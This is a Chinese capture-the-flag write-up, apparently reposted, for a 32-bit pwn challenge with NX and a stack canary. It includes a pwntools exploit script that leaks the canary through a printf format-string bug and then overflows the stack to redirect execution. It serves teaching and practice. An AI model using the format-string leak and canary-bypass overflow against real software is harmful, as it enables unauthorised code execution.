标签：200 0x28 addr canary pwn flag 偏移 Pwn

题目地址 ttp://www.whalectf.xin/files/47a658e388a0c505fc07b6ee48a4a2e2/binary_200

32位，开启了NX和Canary保护

 存在字符串漏洞和栈溢出，做过类似题目，地址跳转

 思路 利用printf泄露出canary的值， 之后再填充进去，然后栈溢出调用system函数来get shell

先看看字符串的偏移，偏移了5字节

 然后确定输入参数到canary的地址

 0x2c-0x4=0x28   0x28/4=10    10+5=15

知道泄露的偏移，就可以进行栈溢出

exp如下

from pwn import *
r=remote('bamboofox.cs.nctu.edu.tw',22002)

e=ELF('./binary_200')
flag_addr=e.symbols['canary_protect_me']
#flag_addr=0x804854d

r.sendline('%15$x')
canary=int(r.recv(), 16)

payload='a'*0x28+p32(canary)+'a'*0xc+p32(flag_addr)
r.sendline(payload)

r.interactive()

标签：200,0x28,addr,canary,pwn,flag,偏移,Pwn
来源： https://www.cnblogs.com/gaonuoqi/p/11770554.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。